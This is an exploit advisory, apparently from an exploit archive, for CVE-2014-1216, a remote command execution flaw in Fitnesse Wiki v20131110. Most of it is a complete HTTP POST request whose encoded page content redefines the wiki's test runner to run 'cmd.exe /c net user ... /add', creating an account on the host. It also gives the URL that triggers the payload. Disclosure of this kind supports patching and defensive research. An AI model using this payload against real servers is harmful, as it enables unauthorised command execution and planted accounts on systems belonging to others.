Fitnesse Wiki 20131110 Remote Command Execution

Vulnerability title: Remote Command Execution in Fitnesse Wiki
CVE: CVE-2014-1216
Vendor: Fitnesse
Product: Wiki
Affected version: v20131110 and earlier
Fixed version: N/A
Reported by: Jerzy Kramarz

Details:

The Fitnesse wiki does not validate the syntax of edited pages to
validate whether the pages are introducing any extra parameters that
could be executed in the context of the application. This vulnerability
could be exploited by remote attackers to introduce external commands
into the workflow of the application that would execute them.

Exploit

After creating a new page in the wiki (or editing already existing page) sending a request similar to below would trigger the vulnerability:

POST /<any page> HTTP/1.1
Host: <host>:<port>
Proxy-Connection: keep-alive
Content-Length: 374
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<host>:<port>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://<host>:<port>/<page>?edit
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: textwrapon=false; wysiwyg=textarea

editTime=1384209902568&ticketId=-7153973663219190464&responder=saveData&helpText=&suites=&__EDITOR__1=textarea&pageContent=%21define+COMMAND_PATTERN+%7B%25m+%7C%7C+%7D%0D%0A%21define+TEST_RUNNER+%7Bcmd.exe+%2Fc+%22net+user+XXXXXXXX+XXXXXXXX+%2Fadd%22%7D%0D%0A%21path+dotnet4%5Cdbfit.dll%0D%0A%21path+dotnet4%5Cdbfit.sqlserver.dll%0D%0A%21path+dotnet2%5C*.dll&save=Save

After editing the page with content specified above, the vulnerability could be triggered by visiting ‘http://<host>:<port>/<created/edited page name>?test’


        

Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/

#  0day.today [2018-01-08]  #